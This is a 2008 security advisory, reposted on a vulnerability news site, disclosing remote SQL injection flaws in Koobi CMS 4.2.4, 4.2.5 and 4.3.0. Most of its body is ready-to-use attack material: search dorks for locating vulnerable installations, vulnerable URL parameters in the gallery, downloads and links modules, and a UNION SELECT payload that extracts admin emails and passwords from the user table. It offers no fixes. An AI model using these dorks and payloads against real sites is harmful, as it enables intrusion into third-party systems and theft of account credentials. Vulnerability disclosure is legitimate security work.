Computer Security

Security Advisory: Koobi CMS 4.2.4/4.2.5/4.3.0 Multiple Remote SQL Injection Vulnerabilities
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Carbon Communities forum Multiple Vulnerabilities.

  remote file include

  Koobi Pro 6.25 poll Remote SQL Injection Vulnerability

  Vulnerability in Trashbin

From:Jose Luis Góngora Fernández <sys-project_(at)_hotmail.com>
Date:16.04.2008
Subject:Koobi CMS 4.2.4/4.2.5/4.3.0 Multiple Remote SQL Injection Vulnerabilities

--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+             Koobi CMS 4.3.0, 4.2.5, 4.2.4 Multiple Remote SQL Injection            +==--
--
==+==============================================================================
======+==--
                    [+] [JosS] + [Spanish Hackers Team] + [Sys - Project]

[+] Info:

[~] Software: Koobi CMS 4.3.0, 4.2.5, 4.2.4
[~] HomePage: http://www.dream4.de/
[~] Exploit: Remote SQL Injection [High]
[~] Where: index.php
[~] Bug Found By: JosS
[~] Contact: sys-project[at]hotmail.com
[~] Web: http://www.spanish-hackers.com

[+] Dorks:

[~] Koobi CMS 4.3.0: "powered by koobi-cms 4.3.0"
[~] Koobi CMS 4.2.5: "powered by koobi-cms 4.2.5"
[~] Koobi CMS 4.2.4: "powered by koobi-cms 4.2.4"

[+] Exploits for 4.3.0:

[~] Module: gallery
[~] /index.php?area=1&p=gallery&action=showimages&galid=[SQL]
[~] Admin Data: -104+union+all+select+1,concat(email,0x203a3a20,pass),
3+from+koobi4_user/*

[~] Module: downloads
[~] /index.php?showfile=1&fid=31&p=downloads&area=1&categ=[SQL]
[~] Admin Data: -104+union+all+select+1,concat(email,0x203a3a20,pass),
3+from+koobi4_user/*

[+] Exploits for 4.2.5:

[~] Module: links
[~] /index.php?showlink=1&fid=1&p=links&area=1&categ=[SQL]
[~] Admin Data: -104+union+all+select+1,concat(email,0x203a3a20,pass),
3+from+koobi4_user/*

[~] Module: downloads
[~] /index.php?showfile=1&fid=1&p=downloads&area=1&categ=[SQL]
[~] Admin Data: -104+union+all+select+1,concat(email,0x203a3a20,pass),
3+from+koobi4_user/*

[+] Exploits for 4.2.4:

[~] Module: downloads
[~] /index.php?showfile=1&fid=31&p=downloads&area=1&categ=[SQL]
[~] Admin Data: -104+union+all+select+1,concat(email,0x203a3a20,pass),
3+from+koobi4_user/*

--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+                                       JosS                                         +==--
--
==+==============================================================================
======+==--
                                      [+] [The End]
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
 


Рейтинг@Mail.ru